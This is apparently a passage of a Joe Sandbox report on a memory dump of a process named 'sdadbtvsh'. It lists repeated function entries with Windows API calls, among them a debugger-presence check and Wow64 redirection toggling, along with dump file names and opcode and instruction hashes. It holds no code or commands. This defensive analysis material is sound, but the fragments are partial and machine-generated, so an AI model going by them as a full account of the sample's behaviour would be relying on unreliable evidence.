                                                                                                • Part of subcall function 0059326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00593282
                                                                                                • Part of subcall function 0059326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00593299
                                                                                                • Part of subcall function 00593312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005932EF,?), ref: 00593342
                                                                                                • Part of subcall function 00593312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005932EF,?), ref: 00593355
                                                                                                • Part of subcall function 00593312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00662418,00662400,?,?,?,?,?,?,005932EF,?), ref: 005933C1
                                                                                                • Part of subcall function 00593312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00593442
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 005932FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                              • String ID:
                                                                                              • API String ID: 1550534281-0
                                                                                              • Opcode ID: 71884711989b62a31137c18a1492712b70f146a776952a0138faeac8d9cd32c6
                                                                                              • Instruction ID: 626097b1b0f2976cdd4ec5bc654f9da9f41f63a475fb81ac8c96ac46d4e8fab9
                                                                                              • Opcode Fuzzy Hash: 71884711989b62a31137c18a1492712b70f146a776952a0138faeac8d9cd32c6
                                                                                              • Instruction Fuzzy Hash: 95F05E71954B46EFEB00AF60EC1EB643F92B704709F105C15F109AA2E2DBF99551CB00
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: SleepTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 346578373-0
                                                                                              • Opcode ID: 65672d22726bf90f62163b408e0b9756d27f7deb762f2c8f9efac80577811a07
                                                                                              • Instruction ID: 33b463004a45d8f56d1e08554db49e3d45a843dc1b6eb2d72e50d2ec8a5b4c4a
                                                                                              • Opcode Fuzzy Hash: 65672d22726bf90f62163b408e0b9756d27f7deb762f2c8f9efac80577811a07
                                                                                              • Instruction Fuzzy Hash: BAF082712406069FD314EB65D409B5ABFE9FF89350F004429E45ACB250DB70B811CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0059AE65,?,?,?), ref: 00598793
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0059AE65,?,?,?), ref: 005987C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              • Opcode ID: 139b95cae51ca0183c1e0e6f7f1804381a9e2799acfcee29d4caa511208e0f95
                                                                                              • Instruction ID: 3d8cd1630f697d818ce1b4e6de565b9175dbe5434d2ab27b301332f6dfa235ef
                                                                                              • Opcode Fuzzy Hash: 139b95cae51ca0183c1e0e6f7f1804381a9e2799acfcee29d4caa511208e0f95
                                                                                              • Instruction Fuzzy Hash: 9B01BC713002057FEB18ABA99D4FF7F7EA9EBC5340F10002EB102DA1E1EEA1AC018224
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5c62506a869aa156e38769c0cc4508cb6f7f88d9dd0d45ea87774f3300c2a57b
                                                                                              • Instruction ID: e1b6fd5099559b909530b6cbf859a69fe6bf6f8d54cbdb5c929e7fb7b761d1cb
                                                                                              • Opcode Fuzzy Hash: 5c62506a869aa156e38769c0cc4508cb6f7f88d9dd0d45ea87774f3300c2a57b
                                                                                              • Instruction Fuzzy Hash: 0A519479A00144AFDB10DF68CC45AE9BFB1FB85364F198168EC089B392C771BD42CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 005FFBE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower
                                                                                              • String ID:
                                                                                              • API String ID: 2358735015-0
                                                                                              • Opcode ID: fdd641d0e3c759bbc6edbd497629e5b37a799458355cd6572793c07909cc6e65
                                                                                              • Instruction ID: 78d7bd3b5aa619cacaa8be6b1ad63a3f9bfef85af84a55695de20c357903a2d1
                                                                                              • Opcode Fuzzy Hash: fdd641d0e3c759bbc6edbd497629e5b37a799458355cd6572793c07909cc6e65
                                                                                              • Instruction Fuzzy Hash: 1B41A1B690020DAFDB15AF64C8859AF7BB9FF84310B11853EEA16D7641EB74EE04CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: 95419de641390aa5f605f17950655d87077dbb7570f641cd1d1b7c2a569bdf9e
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 9B31D874A00109DFC718EF58C488AAAFBB5FB59310BA496A5E40ACB295D731EDC1CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00608EBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePathPrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1991638491-0
                                                                                              • Opcode ID: fa93c0299abb196467247f1c32e29fee4ce863ea48e909104151c36f2f12cd2a
                                                                                              • Instruction ID: 6615f95e6d69feb84b861e47c2adaefb246bf05447a6c1eab65c1a60cc3d0ba5
                                                                                              • Opcode Fuzzy Hash: fa93c0299abb196467247f1c32e29fee4ce863ea48e909104151c36f2f12cd2a
                                                                                              • Instruction Fuzzy Hash: 4C211D35600616AFCF15EB64C95ACAEBBB5FF89360B048054FA45AB3A1DB30FD51CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00596332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059633E
                                                                                                • Part of subcall function 00596332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00596350
                                                                                                • Part of subcall function 00596332: FreeLibrary.KERNEL32(00000000,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596362
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059639F
                                                                                                • Part of subcall function 005962FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596304
                                                                                                • Part of subcall function 005962FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00596316
                                                                                                • Part of subcall function 005962FB: FreeLibrary.KERNEL32(00000000,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 2632591731-0
                                                                                              • Opcode ID: 46dbbeb708c072f20734c3a461f8eae8c0397d186081e077e15016181f5fed47
                                                                                              • Instruction ID: d5e171f45db82651bbfe4e2564ad782dc820769fb2f97173d4ba8388092c64bc
                                                                                              • Opcode Fuzzy Hash: 46dbbeb708c072f20734c3a461f8eae8c0397d186081e077e15016181f5fed47
                                                                                              • Instruction Fuzzy Hash: 09110A31600616AACF24FB74CC16FAD7FA5BF90711F50882EF442AB1C1EEB49A499750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: b48ef03c42561f68179b61a687806d525df70c9ab54f30acdbe2bdfe12379bdf
                                                                                              • Instruction ID: 5a542233a6cbd843f40b0f850e7d3839229cf13d7062721e82931db57325ca1b
                                                                                              • Opcode Fuzzy Hash: b48ef03c42561f68179b61a687806d525df70c9ab54f30acdbe2bdfe12379bdf
                                                                                              • Instruction Fuzzy Hash: 88115A7190410AAFCF15DF98E940EAE7BF5FF48310F14406AF808AB312DA71EA11CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00596B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0059B0AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 7929830c13798d1fc3a88e01aafdfb130745e4e9b88dd0e35e764d435fb875a0
                                                                                              • Instruction ID: 0f76f6d198a2f48520834027e35151309c170a4c3105fe5260d6c58f3f83d27f
                                                                                              • Opcode Fuzzy Hash: 7929830c13798d1fc3a88e01aafdfb130745e4e9b88dd0e35e764d435fb875a0
                                                                                              • Instruction Fuzzy Hash: EF113A31200705DFFB208E15D988B67BBE9FF44754F14C82DE9AA87A51C772A945CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005C500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,005C31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 005C504E
                                                                                              • _free.LIBCMT ref: 005C53FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                              • Instruction ID: 7017178bd6250319ec2a4abff98d649f900011827549289c7b501b8ecf69a327
                                                                                              • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                              • Instruction Fuzzy Hash: F90108B21047455FE3218E959845E59FFD8FB85370F250A1DE18497280FA707945C664
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c5d36067a08cde8a01dde37bb653f58a3d2d3e1b6e6e81f41361ea6f69ed7ab
                                                                                              • Instruction ID: dcdab93f4332759ec03aaa62d9706e68047a390982f80989a369f8566ee8c4f8
                                                                                              • Opcode Fuzzy Hash: 9c5d36067a08cde8a01dde37bb653f58a3d2d3e1b6e6e81f41361ea6f69ed7ab
                                                                                              • Instruction Fuzzy Hash: 74F0AE32501A119AD6312AA59C0EBEA3F58BFD1374F190719F455921D1EF74F80685A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,005C31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 005C504E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: ecdc03da4f6e8d73dda7e3baef069dfdcf3c967bac9a4aaf0340d9ac7fec91aa
                                                                                              • Instruction ID: 08813a7ea2f49bfd7b0247e3e244a91b943cc0f4395c812d85d0be63dc8dbfc2
                                                                                              • Opcode Fuzzy Hash: ecdc03da4f6e8d73dda7e3baef069dfdcf3c967bac9a4aaf0340d9ac7fec91aa
                                                                                              • Instruction Fuzzy Hash: 2AF0B431601D25AEEB315EE29C0EF9A3F48FB807A1B144019AD04F6191EB60F88087E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,005B6A99,?,0000015D,?,?,?,?,005B85D0,000000FF,00000000,?,?), ref: 005C3BE2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 97cddb459133d92818b204ead4c13964cdc2e86d90cd4616a60020bb6afe2c46
                                                                                              • Instruction ID: 0ee3f4d5edaf55541347e9bdc8e484a1946607b879cd671d2739e2eb0b515a03
                                                                                              • Opcode Fuzzy Hash: 97cddb459133d92818b204ead4c13964cdc2e86d90cd4616a60020bb6afe2c46
                                                                                              • Instruction Fuzzy Hash: 0CE0E5312046196FE7202AEA9C04F9A3E49FB417A4F158129FC05D6190DB64ED0086E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84a7b844b18431c79d4ab48941ef8ef4ab6e2483e4ffc33c2ce6a2f831651bc4
                                                                                              • Instruction ID: f129bbb14db7ccfed217a21ef247b9c1de797dd88298f4ef0a9918372a3719ca
                                                                                              • Opcode Fuzzy Hash: 84a7b844b18431c79d4ab48941ef8ef4ab6e2483e4ffc33c2ce6a2f831651bc4
                                                                                              • Instruction Fuzzy Hash: 45F0F271101B12CFCB359F68E498852BFE5BA1432A3248E2EE19B82620D731A884DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 005C512C
                                                                                                • Part of subcall function 005C2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4), ref: 005C2D6E
                                                                                                • Part of subcall function 005C2D58: GetLastError.KERNEL32(00661DC4,?,005CDB71,00661DC4,00000000,00661DC4,00000000,?,005CDB98,00661DC4,00000007,00661DC4,?,005CDF95,00661DC4,00661DC4), ref: 005C2D80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                              • String ID:
                                                                                              • API String ID: 1353095263-0
                                                                                              • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                              • Instruction ID: 98fc139f86c77d4b4bfe9bda117ec0a35041d9294c0eee2bed7dd5123f272b04
                                                                                              • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                              • Instruction Fuzzy Hash: 39E092761007059F8721CFADD804B82BBE4EF95320724853DE89ED7220D371F852CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
